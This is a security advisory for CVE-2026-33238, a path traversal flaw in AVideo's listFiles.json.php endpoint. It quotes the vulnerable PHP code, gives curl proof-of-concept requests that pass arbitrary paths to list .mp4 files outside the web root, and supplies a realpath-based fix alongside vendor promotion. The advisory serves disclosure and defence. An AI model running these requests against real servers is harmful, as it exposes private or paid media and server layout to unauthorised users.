CVE-2026-33238

CVE-2026-33238 is a medium-severity path traversal vulnerability in wwbn/avideo (composer), affecting versions <= 25.0. It is fixed in 26.0.

Summary

The listFiles.json.php endpoint accepts a path POST parameter and passes it directly to glob() without restricting the path to an allowed base directory. An authenticated uploader can traverse the entire server filesystem by supplying arbitrary absolute paths, enumerating .mp4 filenames and their full absolute filesystem paths wherever they exist on the server, including locations outside the web root, such as private or premium media directories.

Details

The vulnerable code is at objects/listFiles.json.php:8-45:

if (!User::canUpload() || !empty($advancedCustom->doNotShowImportMP4Button)) {
    return false;
}
$global['allowed'] = ['mp4'];
// ...
if (!empty($_POST['path'])) {
    $path = $_POST['path'];
    if (substr($path, -1) !== '/') {
        $path .= "/";
    }
    if (file_exists($path)) {
        $extn = implode(",*.", $global['allowed']);
        $filesStr = "{*." . $extn . ",*." . strtolower($extn) . ",*." . strtoupper($extn) . "}";
        $video_array = glob($path . $filesStr, GLOB_BRACE);
        foreach ($video_array as $key => $value) {
            $filePath = mb_convert_encoding($value, 'UTF-8');
            // ...
            $obj->path = $filePath;  // Full absolute path returned to caller

The $_POST['path'] value is used directly in glob() with no call to realpath() for normalization and no prefix check against a permitted base directory (e.g., $global['systemRootPath'] . 'videos/'). The response includes obj->path containing the full absolute filesystem path of each matched file.

The extension filter ({*.mp4,*.mp4,*.MP4}) limits results to .mp4 files, which prevents reading credentials or source code but does not prevent enumeration of video files stored in access-controlled locations such as:

  • Premium/paid content directories
  • Private or unlisted media stores
  • Backup directories containing .mp4 files
  • Paths revealing sensitive server directory structure

canUpload is a standard low-privilege role granted to any registered uploader; it does not imply administrative trust.

PoC

# Step 1: Authenticate as any user with canUpload permission
# (standard uploader account)

# Step 2: Enumerate MP4 files in the web root (expected behavior)
curl -b "PHPSESSID=<session>" -X POST https://target.avideo.site/listFiles \
  -d "path=/var/www/html/videos/"
# Returns: [{"id":0,"path":"/var/www/html/videos/video1.mp4","name":"video1.mp4"}, ...]

# Step 3: Traverse outside intended directory to private content store
curl -b "PHPSESSID=<session>" -X POST https://target.avideo.site/listFiles \
  -d "path=/var/private/premium-content/"
# Returns: [{"id":0,"path":"/var/private/premium-content/paywalled-video.mp4","name":"paywalled-video.mp4"}, ...]

# Step 4: Enumerate root filesystem for any MP4 files
curl -b "PHPSESSID=<session>" -X POST https://target.avideo.site/listFiles \
  -d "path=/"
# Returns all .mp4 files visible to the web server process anywhere on disk

Expected behavior: Only files within the designated upload directory should be listable.
Actual behavior: Files from any path readable by the web server process are returned with full absolute paths.

Impact

  • Unauthorized media enumeration: An uploader can discover private, premium, or access-controlled .mp4 files stored outside their permitted directory.
  • Filesystem structure disclosure: Full absolute paths reveal server directory layout, aiding further attacks.
  • Content bypass: In AVideo deployments where premium video files are stored in filesystem directories not protected by application access control, this exposes the filenames and paths needed to directly access them if other path traversal or direct-file-access weaknesses are present.
  • Blast radius: Requires canUpload permission (low privilege), but this is the standard permission for all video uploaders on a multi-user AVideo instance.

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

CVE-2026-33238 has a CVSS score of 4.3 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (26.0); upgrading removes the vulnerable code path.

Affected versions

wwbn/avideo (<= 25.0)

Security releases

wwbn/avideo → 26.0 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Restrict the supplied path to an allowed base directory using realpath():

if (!empty($_POST['path'])) {
    $allowedBase = realpath($global['systemRootPath'] . 'videos') . '/';
    $path = realpath($_POST['path']);

    // Reject paths that don't start with the allowed base
    if ($path === false || strpos($path . '/', $allowedBase) !== 0) {
        http_response_code(403);
        echo json_encode(['error' => 'Path not allowed']);
        exit;
    }
    $path .= '/';
    // ... continue with glob
}

realpath() resolves ../ sequences before the prefix check, preventing traversal bypasses.

Frequently Asked Questions

  1. What is CVE-2026-33238? CVE-2026-33238 is a medium-severity path traversal vulnerability in wwbn/avideo (composer), affecting versions <= 25.0. It is fixed in 26.0. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. How severe is CVE-2026-33238? CVE-2026-33238 has a CVSS score of 4.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-33238? wwbn/avideo (composer) versions <= 25.0 is affected.
  4. Is there a fix for CVE-2026-33238? Yes. CVE-2026-33238 is fixed in 26.0. Upgrade to this version or later.
  5. Is CVE-2026-33238 exploitable, and should I be worried? Whether CVE-2026-33238 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-33238 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33238? Upgrade wwbn/avideo to 26.0 or later.

Other vulnerabilities in wwbn/avideo

CVE-2026-55173CVE-2026-33731CVE-2026-33692CVE-2026-33684CVE-2026-54458

Stop the waste.
Protect your environment with Kodem.